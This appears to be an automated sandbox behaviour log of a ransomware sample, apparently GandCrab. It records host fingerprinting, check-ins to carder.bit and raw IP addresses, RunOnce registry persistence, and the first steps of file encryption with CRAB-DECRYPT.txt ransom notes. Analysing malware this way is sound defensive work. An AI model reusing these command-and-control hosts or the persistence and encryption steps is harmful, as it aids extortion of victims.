Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77210000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77236b10 True 1
Fn
System Get Time type = Ticks, time = 41406 True 1
Fn
System Get Computer Name result_out = LHNIWSJ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Control Panel\International True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Control Panel\International, value_name = LocaleName, data = 101 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 1, data = 48 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 2, data = 48 False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = productName, data = 87 True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77210000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77236b10 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Fn
Inet Read Response size = 10238, size_out = 14 True 1
Fn
Data
Inet Read Response size = 10238, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Get Filename process_name = c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tlgmea.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tlgmea.exe, size = 256 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tlgmea.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tlgmea.exe, type = size True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tlgmea.exe, size = 326665, size_out = 326665 True 1
Fn
Data
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77210000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77236b10 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
Process Create process_name = nslookup carder.bit ns1.wowservers.ru, os_pid = 0x9e0, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
File Read size = 4096, size_out = 307 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 46.238.18.241, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = ayssay?ore=phow&bai=ph, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Inet Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 46.238.18.241/ayssay?ore=phow&bai=ph True 1
Fn
Data
Inet Read Response size = 204798, size_out = 552 True 1
Fn
Data
Inet Read Response size = 204798, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77210000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77236b10 True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Ticks, time = 49421 True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
System Get Time type = Ticks, time = 50734 True 2
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77210000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77236b10 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77210000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77236b10 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
Process Create process_name = nslookup carder.bit ns1.wowservers.ru, os_pid = 0xb98, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
File Read size = 4096, size_out = 307 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 188.254.142.91, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = ghowb?a=za&bowge=bapl, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Inet Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 188.254.142.91/ghowb?a=za&bowge=bapl False 1
Fn
Thread 0x944
274 0
»
Category Operation Information Success Count Logfile
Driver Enumerate load_addresses = 1703688 True 1
Fn
Driver Enumerate load_addresses = 1900544 True 1
Fn
Driver Get Name load_address = 1967206400 True 1
Fn
Driver Get Name load_address = 1975930880 True 1
Fn
Driver Get Name load_address = 1951469568 True 1
Fn
Driver Get Name load_address = 2174550016 True 1
Fn
Driver Get Name load_address = 2175139840 True 1
Fn
Driver Get Name load_address = 2175205376 True 1
Fn
Driver Get Name load_address = 2175664128 True 1
Fn
Driver Get Name load_address = 2175860736 True 1
Fn
Driver Get Name load_address = 2175991808 True 1
Fn
Driver Get Name load_address = 2176057344 True 1
Fn
Driver Get Name load_address = 2176122880 True 1
Fn
Driver Get Name load_address = 2176188416 True 1
Fn
Driver Get Name load_address = 2160066560 True 1
Fn
Driver Get Name load_address = 2160459776 True 1
Fn
Driver Get Name load_address = 2160918528 True 1
Fn
Driver Get Name load_address = 2161115136 True 1
Fn
Driver Get Name load_address = 2161770496 True 1
Fn
Driver Get Name load_address = 2162688000 True 1
Fn
Driver Get Name load_address = 2162819072 True 1
Fn
Driver Get Name load_address = 2163015680 True 1
Fn
Driver Get Name load_address = 2163081216 True 1
Fn
Driver Get Name load_address = 2163736576 True 1
Fn
Driver Get Name load_address = 2164326400 True 1
Fn
Driver Get Name load_address = 2164391936 True 1
Fn
Driver Get Name load_address = 2164523008 True 1
Fn
Driver Get Name load_address = 2164588544 True 1
Fn
Driver Get Name load_address = 2164719616 True 1
Fn
Driver Get Name load_address = 2164785152 True 1
Fn
Driver Get Name load_address = 2165178368 True 1
Fn
Driver Get Name load_address = 2165243904 True 1
Fn
Driver Get Name load_address = 2165374976 True 1
Fn
Driver Get Name load_address = 2165506048 True 1
Fn
Driver Get Name load_address = 2165702656 True 1
Fn
Driver Get Name load_address = 2166226944 True 1
Fn
Driver Get Name load_address = 2166358016 True 1
Fn
Driver Get Name load_address = 2166751232 True 1
Fn
Driver Get Name load_address = 2166882304 True 1
Fn
Driver Get Name load_address = 2167078912 True 1
Fn
Driver Get Name load_address = 2167603200 True 1
Fn
Driver Get Name load_address = 2167734272 True 1
Fn
Driver Get Name load_address = 2167865344 True 1
Fn
Driver Get Name load_address = 2168127488 True 1
Fn
Driver Get Name load_address = 2168455168 True 1
Fn
Driver Get Name load_address = 2170683392 True 1
Fn
Driver Get Name load_address = 2170748928 True 1
Fn
Driver Get Name load_address = 2171994112 True 1
Fn
Driver Get Name load_address = 2172518400 True 1
Fn
Driver Get Name load_address = 2185953280 True 1
Fn
Driver Get Name load_address = 2188443648 True 1
Fn
Driver Get Name load_address = 2188902400 True 1
Fn
Driver Get Name load_address = 2176843776 True 1
Fn
Driver Get Name load_address = 2177499136 True 1
Fn
Driver Get Name load_address = 2177892352 True 1
Fn
Driver Get Name load_address = 2178220032 True 1
Fn
Driver Get Name load_address = 2178482176 True 1
Fn
Driver Get Name load_address = 2178613248 True 1
Fn
Driver Get Name load_address = 2179137536 True 1
Fn
Driver Get Name load_address = 2180317184 True 1
Fn
Driver Get Name load_address = 2180448256 True 1
Fn
Driver Get Name load_address = 2180513792 True 1
Fn
Driver Get Name load_address = 2180579328 True 1
Fn
Driver Get Name load_address = 2180644864 True 1
Fn
Driver Get Name load_address = 2180775936 True 1
Fn
Driver Get Name load_address = 2180907008 True 1
Fn
Driver Get Name load_address = 2182938624 True 1
Fn
Driver Get Name load_address = 2183069696 True 1
Fn
Driver Get Name load_address = 2183200768 True 1
Fn
Driver Get Name load_address = 2183266304 True 1
Fn
Driver Get Name load_address = 2183462912 True 1
Fn
Driver Get Name load_address = 2183528448 True 1
Fn
Driver Get Name load_address = 2183856128 True 1
Fn
Driver Get Name load_address = 2184511488 True 1
Fn
Driver Get Name load_address = 2184642560 True 1
Fn
Driver Get Name load_address = 2184839168 True 1
Fn
Driver Get Name load_address = 2184970240 True 1
Fn
Driver Get Name load_address = 2172715008 True 1
Fn
Driver Get Name load_address = 2185494528 True 1
Fn
Driver Get Name load_address = 2185560064 True 1
Fn
Driver Get Name load_address = 2185625600 True 1
Fn
Driver Get Name load_address = 2185691136 True 1
Fn
Driver Get Name load_address = 2185756672 True 1
Fn
Driver Get Name load_address = 2180055040 True 1
Fn
Driver Get Name load_address = 2189099008 True 1
Fn
Driver Get Name load_address = 2189230080 True 1
Fn
Driver Get Name load_address = 2189295616 True 1
Fn
Driver Get Name load_address = 2173304832 True 1
Fn
Driver Get Name load_address = 2173435904 True 1
Fn
Driver Get Name load_address = 2173829120 True 1
Fn
Driver Get Name load_address = 2174025728 True 1
Fn
Driver Get Name load_address = 2198142976 True 1
Fn
Driver Get Name load_address = 2198274048 True 1
Fn
Driver Get Name load_address = 2198798336 True 1
Fn
Driver Get Name load_address = 2199846912 True 1
Fn
Driver Get Name load_address = 2191523840 True 1
Fn
Driver Get Name load_address = 2191589376 True 1
Fn
Driver Get Name load_address = 2191654912 True 1
Fn
Driver Get Name load_address = 2192179200 True 1
Fn
Driver Get Name load_address = 2192244736 True 1
Fn
Driver Get Name load_address = 2192703488 True 1
Fn
Driver Get Name load_address = 2192834560 True 1
Fn
Driver Get Name load_address = 2193096704 True 1
Fn
Driver Get Name load_address = 2193424384 True 1
Fn
Driver Get Name load_address = 2193555456 True 1
Fn
Driver Get Name load_address = 2193686528 True 1
Fn
Driver Get Name load_address = 2193883136 True 1
Fn
Driver Get Name load_address = 2194014208 True 1
Fn
Driver Get Name load_address = 2194079744 True 1
Fn
Driver Get Name load_address = 2194210816 True 1
Fn
Driver Get Name load_address = 2194276352 True 1
Fn
Driver Get Name load_address = 2194341888 True 1
Fn
Driver Get Name load_address = 3463708672 True 1
Fn
Driver Get Name load_address = 3454009344 True 1
Fn
Driver Get Name load_address = 3457744896 True 1
Fn
Driver Get Name load_address = 2195914752 True 1
Fn
Driver Get Name load_address = 2195980288 True 1
Fn
Driver Get Name load_address = 3459186688 True 1
Fn
Driver Get Name load_address = 3459252224 True 1
Fn
Driver Get Name load_address = 2196504576 True 1
Fn
Driver Get Name load_address = 2196701184 True 1
Fn
Driver Get Name load_address = 2196832256 True 1
Fn
Driver Get Name load_address = 2196963328 True 1
Fn
Driver Get Name load_address = 2197094400 True 1
Fn
Driver Get Name load_address = 2194472960 True 1
Fn
Driver Get Name load_address = 2195521536 True 1
Fn
Driver Get Name load_address = 2195652608 True 1
Fn
Driver Get Name load_address = 2197225472 True 1
Fn
Driver Get Name load_address = 2197684224 True 1
Fn
Driver Get Name load_address = 2197946368 True 1
Fn
Driver Get Name load_address = 2199322624 True 1
Fn
Driver Get Name load_address = 2179268608 True 1
Fn
Driver Get Name load_address = 2199650304 True 1
Fn
Driver Get Name load_address = 2221342720 True 1
Fn
Driver Get Name load_address = 2221670400 True 1
Fn
Driver Get Name load_address = 2221867008 True 1
Fn
Driver Get Name load_address = 2208301056 True 1
Fn
Driver Get Name load_address = 2208890880 True 1
Fn
Driver Get Name load_address = 2209021952 True 1
Fn
Driver Get Name load_address = 2209218560 True 1
Fn
Driver Enumerate load_addresses = 1703688 True 1
Fn
Driver Enumerate load_addresses = 1900544 True 1
Fn
Driver Get Name load_address = 1967206400 True 1
Fn
Driver Get Name load_address = 1975930880 True 1
Fn
Driver Get Name load_address = 1951469568 True 1
Fn
Driver Get Name load_address = 2174550016 True 1
Fn
Driver Get Name load_address = 2175139840 True 1
Fn
Driver Get Name load_address = 2175205376 True 1
Fn
Driver Get Name load_address = 2175664128 True 1
Fn
Driver Get Name load_address = 2175860736 True 1
Fn
Driver Get Name load_address = 2175991808 True 1
Fn
Driver Get Name load_address = 2176057344 True 1
Fn
Driver Get Name load_address = 2176122880 True 1
Fn
Driver Get Name load_address = 2176188416 True 1
Fn
Driver Get Name load_address = 2160066560 True 1
Fn
Driver Get Name load_address = 2160459776 True 1
Fn
Driver Get Name load_address = 2160918528 True 1
Fn
Driver Get Name load_address = 2161115136 True 1
Fn
Driver Get Name load_address = 2161770496 True 1
Fn
Driver Get Name load_address = 2162688000 True 1
Fn
Driver Get Name load_address = 2162819072 True 1
Fn
Driver Get Name load_address = 2163015680 True 1
Fn
Driver Get Name load_address = 2163081216 True 1
Fn
Driver Get Name load_address = 2163736576 True 1
Fn
Driver Get Name load_address = 2164326400 True 1
Fn
Driver Get Name load_address = 2164391936 True 1
Fn
Driver Get Name load_address = 2164523008 True 1
Fn
Driver Get Name load_address = 2164588544 True 1
Fn
Driver Get Name load_address = 2164719616 True 1
Fn
Driver Get Name load_address = 2164785152 True 1
Fn
Driver Get Name load_address = 2165178368 True 1
Fn
Driver Get Name load_address = 2165243904 True 1
Fn
Driver Get Name load_address = 2165374976 True 1
Fn
Driver Get Name load_address = 2165506048 True 1
Fn
Driver Get Name load_address = 2165702656 True 1
Fn
Driver Get Name load_address = 2166226944 True 1
Fn
Driver Get Name load_address = 2166358016 True 1
Fn
Driver Get Name load_address = 2166751232 True 1
Fn
Driver Get Name load_address = 2166882304 True 1
Fn
Driver Get Name load_address = 2167078912 True 1
Fn
Driver Get Name load_address = 2167603200 True 1
Fn
Driver Get Name load_address = 2167734272 True 1
Fn
Driver Get Name load_address = 2167865344 True 1
Fn
Driver Get Name load_address = 2168127488 True 1
Fn
Driver Get Name load_address = 2168455168 True 1
Fn
Driver Get Name load_address = 2170683392 True 1
Fn
Driver Get Name load_address = 2170748928 True 1
Fn
Driver Get Name load_address = 2171994112 True 1
Fn
Driver Get Name load_address = 2172518400 True 1
Fn
Driver Get Name load_address = 2185953280 True 1
Fn
Driver Get Name load_address = 2188443648 True 1
Fn
Driver Get Name load_address = 2188902400 True 1
Fn
Driver Get Name load_address = 2176843776 True 1
Fn
Driver Get Name load_address = 2177499136 True 1
Fn
Driver Get Name load_address = 2177892352 True 1
Fn
Driver Get Name load_address = 2178220032 True 1
Fn
Driver Get Name load_address = 2178482176 True 1
Fn
Driver Get Name load_address = 2178613248 True 1
Fn
Driver Get Name load_address = 2179137536 True 1
Fn
Driver Get Name load_address = 2180317184 True 1
Fn
Driver Get Name load_address = 2180448256 True 1
Fn
Driver Get Name load_address = 2180513792 True 1
Fn
Driver Get Name load_address = 2180579328 True 1
Fn
Driver Get Name load_address = 2180644864 True 1
Fn
Driver Get Name load_address = 2180775936 True 1
Fn
Driver Get Name load_address = 2180907008 True 1
Fn
Driver Get Name load_address = 2182938624 True 1
Fn
Driver Get Name load_address = 2183069696 True 1
Fn
Driver Get Name load_address = 2183200768 True 1
Fn
Driver Get Name load_address = 2183266304 True 1
Fn
Driver Get Name load_address = 2183462912 True 1
Fn
Driver Get Name load_address = 2183528448 True 1
Fn
Driver Get Name load_address = 2183856128 True 1
Fn
Driver Get Name load_address = 2184511488 True 1
Fn
Driver Get Name load_address = 2184642560 True 1
Fn
Driver Get Name load_address = 2184839168 True 1
Fn
Driver Get Name load_address = 2184970240 True 1
Fn
Driver Get Name load_address = 2172715008 True 1
Fn
Driver Get Name load_address = 2185494528 True 1
Fn
Driver Get Name load_address = 2185560064 True 1
Fn
Driver Get Name load_address = 2185625600 True 1
Fn
Driver Get Name load_address = 2185691136 True 1
Fn
Driver Get Name load_address = 2185756672 True 1
Fn
Driver Get Name load_address = 2180055040 True 1
Fn
Driver Get Name load_address = 2189099008 True 1
Fn
Driver Get Name load_address = 2189230080 True 1
Fn
Driver Get Name load_address = 2189295616 True 1
Fn
Driver Get Name load_address = 2173304832 True 1
Fn
Driver Get Name load_address = 2173435904 True 1
Fn
Driver Get Name load_address = 2173829120 True 1
Fn
Driver Get Name load_address = 2174025728 True 1
Fn
Driver Get Name load_address = 2198142976 True 1
Fn
Driver Get Name load_address = 2198274048 True 1
Fn
Driver Get Name load_address = 2198798336 True 1
Fn
Driver Get Name load_address = 2199846912 True 1
Fn
Driver Get Name load_address = 2191523840 True 1
Fn
Driver Get Name load_address = 2191589376 True 1
Fn
Driver Get Name load_address = 2191654912 True 1
Fn
Driver Get Name load_address = 2192179200 True 1
Fn
Driver Get Name load_address = 2192244736 True 1
Fn
Driver Get Name load_address = 2192703488 True 1
Fn
Driver Get Name load_address = 2192834560 True 1
Fn
Driver Get Name load_address = 2193096704 True 1
Fn
Driver Get Name load_address = 2193424384 True 1
Fn
Driver Get Name load_address = 2193555456 True 1
Fn
Driver Get Name load_address = 2193686528 True 1
Fn
Driver Get Name load_address = 2193883136 True 1
Fn
Driver Get Name load_address = 2194014208 True 1
Fn
Driver Get Name load_address = 2194079744 True 1
Fn
Driver Get Name load_address = 2194210816 True 1
Fn
Driver Get Name load_address = 2194276352 True 1
Fn
Driver Get Name load_address = 2194341888 True 1
Fn
Driver Get Name load_address = 3463708672 True 1
Fn
Driver Enumerate load_addresses = 1703688 True 1
Fn
Driver Enumerate load_addresses = 1900544 True 1
Fn
Driver Enumerate load_addresses = 1703576 True 1
Fn
Driver Enumerate load_addresses = 1900544 True 1
Fn
Driver Enumerate load_addresses = 1703588 True 1
Fn
Driver Enumerate load_addresses = 1900544 True 1
Fn
Driver Enumerate load_addresses = 1703588 True 1
Fn
Driver Enumerate load_addresses = 1900544 True 1
Fn
Driver Enumerate load_addresses = 1703588 True 1
Fn
Driver Enumerate load_addresses = 1900544 True 1
Fn
Module Get Filename process_name = c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tlgmea.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tlgmea.exe, size = 256 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74b50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74b70df0 True 1
Fn
Environment Get Environment String name = AppData, result_out = C:\Users\CIiHmnxMn6Ps\AppData\Roaming True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74b50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74b70df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74b50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x74b6f8d0 True 1
Fn
Registry Create Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce True 1
Fn
Registry Write Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, value_name = jmwxwhemqvq, data = "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tlgmea.exe", size = 120, type = REG_SZ True 1
Fn
Thread 0xb90
273 0
»
Category Operation Information Success Count Logfile
File Create filename = C:\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\$Recycle.Bin\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\$Recycle.Bin\S-1-5-18\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\$Recycle.Bin\S-1-5-21-1462094071-1423818996-289466292-1000\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Get Info filename = C:\bootmgr, type = file_attributes True 1
Fn
File Move source_filename = C:\bootmgr, destination_filename = C:\bootmgr.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74b50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74b70df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74b50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74b70df0 True 1
Fn
File Create filename = C:\bootmgr.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Move source_filename = C:\bootmgr.CRAB, destination_filename = C:\bootmgr True 1
Fn
File Create filename = C:\Documents and Settings\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\PerfLogs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Program Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Program Files (x86)\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Recovery\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Recovery\WindowsRE\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\System Volume Information\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Collab\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
